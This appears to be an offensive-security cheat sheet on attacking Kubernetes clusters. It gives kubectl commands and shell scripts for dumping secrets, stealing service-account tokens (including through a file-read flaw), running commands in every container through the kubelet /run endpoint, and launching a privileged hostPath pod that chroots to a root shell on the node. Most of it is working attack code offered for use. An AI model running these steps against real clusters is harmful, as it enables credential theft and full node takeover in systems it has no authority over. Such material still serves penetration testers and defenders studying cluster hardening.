killchain-compendium/Enumeration/Kubernetes.md


Kubernetes Enumeration

Kubernetes clusters stack many layers of abstraction, which are hard to keep track of even for the people paid to run the cluster. The hard part of enumerating an unknown cluster is the sheer number of possible configurations you may be facing: RBAC rules, admission controllers, network policies and per-node kubelet settings all differ from cluster to cluster.
Ideally, enumeration ends with a high-privilege service account token, or better, with real credentials stored as secrets in the cluster.

Kubectl

Check every kind of object in the namespaces you have permissions for. Start by checking what you are permitted to do. Without -n this is evaluated in the current namespace of your kubeconfig, so repeat it with -n <namespace> for every namespace you learn about.

kubectl auth can-i --list

Follow up with a listing and description of all pods; -A lists across all namespaces.

kubectl get pods -A

Check what else you can list. Secrets are the prize, but services, nodes, deployments, ingresses and jobs tell you where the interesting workloads and entry points are.

kubectl get services
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get ingress
kubectl get jobs
  • Details of a single secret, and its content. describe only prints the key names and value sizes and does not accept -o; use get with -o yaml or -o json for the values, which are base64-encoded in the data field (decode with base64 -d).
kubectl describe secret <secret>
kubectl get secret <secret> -o yaml
kubectl get secret <secret> -o json

Abuse Token

  • Inside a pod the service account token (a JWT) is mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, next to ca.crt and namespace. With any file read primitive, such as an LFI in the application, extract the token and check what it is permitted to list and describe. The token works from anywhere the API server is reachable, not only from inside the pod; when no kubeconfig points at the cluster, add --server=https://<api-server>:6443 and either --certificate-authority=ca.crt or --insecure-skip-tls-verify. Newer bound tokens expire and stop working once their pod is deleted, so use them while the pod is still around.
kubectl auth can-i --list --token=$TOKEN
kubectl get pods  --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
  • Do not copy the token around by hand; it ends in a kerfuffle of truncated strings most of the time. Read it straight from the file into a variable and spare yourself the pain:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
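Before spending the token, it pays to know whose it is. The JWT payload names the service account and namespace (and, for bound tokens, the expiry), which tells you which namespace to run can-i against. The script below is an added example and not part of the original page: it decodes the payload without verifying the signature (this is only for reading claims), then enumerates permissions with the token. API_SERVER is an assumed variable naming the API server endpoint, e.g. https://10.0.0.1:6443.

```sh
#!/bin/sh
# Added example: triage a service-account token before using it.
# Assumptions (hypothetical): kubectl is on PATH and API_SERVER points at the
# API server, e.g. https://10.0.0.1:6443. GNU coreutils base64 is assumed.

SA_TOKEN_FILE=/var/run/secrets/kubernetes.io/serviceaccount/token

# Second dot-separated JWT segment: base64url -> standard base64, re-padded.
jwt_payload() {
    seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
    case $(( ${#seg} % 4 )) in
        2) seg="${seg}==" ;;
        3) seg="${seg}=" ;;
    esac
    printf '%s' "$seg" | base64 -d 2>/dev/null
}

# "sub" claim of a service account token: system:serviceaccount:<ns>:<name>
jwt_subject() {
    jwt_payload "$1" | sed -n 's/.*"sub"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p'
}

sa_namespace() { jwt_subject "$1" | cut -d: -f3; }
sa_name()      { jwt_subject "$1" | cut -d: -f4; }

# "exp" claim (unix time) for bound tokens; empty for legacy non-expiring ones.
jwt_exp() {
    jwt_payload "$1" | sed -n 's/.*"exp"[[:space:]]*:[[:space:]]*\([0-9]*\).*/\1/p'
}

# Print what the token is, then ask the API server what it may do, both in the
# default namespace and in the namespace the account actually lives in.
triage_token() {
    tok=$1
    ns=$(sa_namespace "$tok")
    echo "subject:   $(jwt_subject "$tok")"
    echo "namespace: $ns"
    echo "account:   $(sa_name "$tok")"
    exp=$(jwt_exp "$tok")
    [ -n "$exp" ] && echo "expires:   $exp (unix time)"
    if command -v kubectl >/dev/null 2>&1; then
        kubectl --server="${API_SERVER:?set API_SERVER}" --insecure-skip-tls-verify \
            --token="$tok" auth can-i --list
        kubectl --server="$API_SERVER" --insecure-skip-tls-verify \
            --token="$tok" -n "$ns" auth can-i --list
    fi
}

# Usage: read the token from the mounted file, never paste it by hand.
if [ -r "$SA_TOKEN_FILE" ]; then
    TOKEN=$(cat "$SA_TOKEN_FILE")
    triage_token "$TOKEN"
fi
```

Legacy tokens (secret-based, no exp claim) never expire and survive pod deletion, which makes them worth keeping; bound tokens are the ones to use quickly.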

Elevate Permissions with found token

If you have a token but kubectl exec into other containers is refused by RBAC, try the kubelet API directly. Every node runs a kubelet listening on port 10250 with its own authentication and authorization settings: in webhook mode it checks the token against the nodes/proxy subresource rather than pods/exec, so a token that cannot exec through the API server may still be allowed here, and a kubelet started with anonymous access or --authorization-mode=AlwaysAllow does not check at all. The /run endpoint executes a command in a container; $K8_IP is the IP of the node the pod is scheduled on, not the API server, and -k skips the kubelet's usually self-signed certificate.

curl  -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER

To build the URL you want to query, find the namespace and pod name (-o wide also shows the node each pod runs on):

kubectl get pods -A

Next, take the container name from the pod description, under spec.containers[].name (status.containerStatuses[].name lists the same names for containers that have started):

kubectl get pod $POD -n $NAMESPACE -o yaml

Interesting find in any high priv container are

/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt

Enumerate again with the newly found token:

kubectl auth can-i --list --token=$TOKEN
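The namespace/pod/container/node lookups above are tedious by hand once a cluster has more than a handful of pods. The script below is an added example, not code from the original page: one kubectl jsonpath query pulls namespace, pod, the node IP the pod runs on (status.hostIP, i.e. the kubelet to talk to) and all container names, and the sweep tries the kubelet /run endpoint in every container with the token. TOKEN is assumed to hold the token and KUBELET_PORT the (default) kubelet port; list_pod_containers needs a cluster, the parsing and URL building run offline.

```sh
#!/bin/sh
# Added example: sweep every container via its node's kubelet /run endpoint.
# Assumptions (hypothetical): TOKEN is set, kubectl already reaches the API
# server with it, and kubelets listen on the default port 10250.
KUBELET_PORT=${KUBELET_PORT:-10250}

# One line per pod: <namespace>|<pod>|<hostIP>|<container> [<container> ...]
# '|' as separator keeps an empty hostIP (pod not scheduled yet) as an empty
# field instead of collapsing it.
list_pod_containers() {
    kubectl get pods -A --token="$TOKEN" -o jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.metadata.name}{"|"}{.status.hostIP}{"|"}{range .spec.containers[*]}{.name}{" "}{end}{"\n"}{end}'
}

# Expand per-pod lines into one "<hostIP> <namespace> <pod> <container>" line
# per container, so each becomes exactly one kubelet request.
expand_containers() {
    while IFS='|' read -r ns pod host rest; do
        [ -n "$host" ] || continue          # pending pods have no node yet
        for c in $rest; do
            printf '%s %s %s %s\n' "$host" "$ns" "$pod" "$c"
        done
    done
}

kubelet_run_url() {
    printf 'https://%s:%s/run/%s/%s/%s\n' "$1" "$KUBELET_PORT" "$2" "$3" "$4"
}

# Run a command in every container through the kubelet. -k because kubelet
# serving certs are usually self-signed; a 401/403 means the kubelet enforces
# auth for this token, a timeout usually means 10250 is firewalled.
sweep_kubelet() {
    cmd=${1:-id}
    expand_containers | while read -r host ns pod c; do
        url=$(kubelet_run_url "$host" "$ns" "$pod" "$c")
        printf '== %s\n' "$url"
        curl -sk -m 10 -H "Authorization: Bearer $TOKEN" --data "cmd=$cmd" "$url"
        echo
    done
}

# Usage (needs a cluster):
#   list_pod_containers | sweep_kubelet id
```

A container that answers with a root id while kubectl exec is denied is the one to read /run/secrets/kubernetes.io/serviceaccount/token from next (cmd=cat%20/run/secrets/kubernetes.io/serviceaccount/token).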

Create Malicious Pods

  • Use BishopFox's BadPods, a set of pod templates that abuse hostPID, hostNetwork, hostPath, privileged and similar settings, each with an exec and a reverse-shell variant
  • If there is no internet connection, set imagePullPolicy: IfNotPresent in the YAML and use an image that is already present on the node (check the images of running pods); otherwise the pod never leaves ImagePullBackOff
kubectl apply -f pod.yml --token=$TOKEN
  • Then get a shell in the pod (the name below is the one used by the BadPods everything-allowed template)
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
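The two bullets above are one procedure: pick an image the node already has, write a pod that gives up every isolation boundary, apply it and exec in. The script below is an added example and is neither the original page's code nor one of the BadPods templates; it writes a minimal "everything allowed" pod by hand. TOKEN is assumed to work against the API server, NODE is an assumed optional variable pinning the pod to a specific node (so that the chosen image is guaranteed to be cached there), and the node is assumed to be Linux.

```sh
#!/bin/sh
# Added example: launch a node-takeover pod with a locally cached image.
# Assumptions (hypothetical): TOKEN is set and kubectl reaches the API server
# with it; NODE optionally names the node to land on.

# Images of running pods, space-separated (restricted to NODE when set, since
# only that node is known to have them pulled).
list_running_images() {
    sel="status.phase=Running"
    [ -n "$NODE" ] && sel="$sel,spec.nodeName=$NODE"
    kubectl get pods -A --token="$TOKEN" --field-selector="$sel" \
        -o jsonpath='{.items[*].spec.containers[*].image}'
}

# First image from a space-separated list; with IfNotPresent the kubelet
# starts it without touching a registry.
pick_cached_image() {
    tr ' ' '\n' | sed '/^$/d' | head -n 1
}

# hostPID + privileged + the node's root filesystem at /host: chroot /host
# then gives a root shell on the node itself. nodeName is only emitted when a
# node was given. Name matches the BadPods everything-allowed template.
pod_manifest() {
    image=$1
    node=$2
    cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
spec:
  ${node:+nodeName: $node}
  hostPID: true
  hostNetwork: true
  restartPolicy: Never
  containers:
  - name: everything-allowed
    image: $image
    imagePullPolicy: IfNotPresent
    command: ["/bin/sh", "-c", "sleep 1d"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostroot
  volumes:
  - name: hostroot
    hostPath:
      path: /
EOF
}

# Apply, wait for the container to start, then drop into the node's root fs.
launch_pod() {
    image=$(list_running_images | pick_cached_image)
    : "${image:?no running image found to reuse}"
    pod_manifest "$image" "$NODE" > pod.yml
    kubectl apply -f pod.yml --token="$TOKEN"
    kubectl wait --for=condition=Ready pod/everything-allowed-exec-pod \
        --token="$TOKEN" --timeout=120s
    kubectl exec -it everything-allowed-exec-pod --token="$TOKEN" -- chroot /host /bin/sh
}

# Usage (needs a cluster):  NODE=worker-1 sh -c '. ./badpod.sh; launch_pod'
```

If the apply is rejected with a Pod Security admission error, the namespace enforces the restricted or baseline profile; try a namespace that can-i showed you can create pods in and that has no pod-security labels.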

Get a Shell in a Pod

kubectl exec -it  <podname> -n <namespace> -- /bin/bash

Tools

Microk8s

Microk8s bundles its own kubectl, invoked as microk8s kubectl; the same enumeration applies.

microk8s kubectl get nodes
microk8s kubectl get services
microk8s kubectl get pods
microk8s kubectl get deployments -o wide
microk8s kubectl cluster-info